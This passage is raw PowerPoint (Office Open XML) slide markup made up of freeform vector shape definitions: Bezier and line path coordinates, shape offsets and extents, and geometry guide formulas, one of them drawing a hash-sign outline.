                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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7"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159"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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>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5"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="66"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="72"/>
                      <a:pt x="90" y="75"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>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70"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70"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6" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="119" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135"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2" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="41"/>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6" y="33"/>
                      <a:pt x="65" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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6"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96"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5"/>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267"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="5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Freeform 268"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="59"/>
                <a:ext cx="4" cy="2"/>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269"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 270"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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271"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 272"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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273"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 274"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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275"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 276"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 277"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 278"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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279"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="739"/>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Freeform 280"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="743"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 219"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 219"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61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60 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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281"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="739"/>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Freeform 282"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="739"/>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283"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="73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Freeform 284"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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285"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 286"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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287"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 288"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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289"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="73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Freeform 290"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="73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291"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 292"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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293"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 294"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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295"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 296"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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297"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 298"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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299"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 300"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="730"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 202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8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4 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 74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6 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 146 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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4"/>
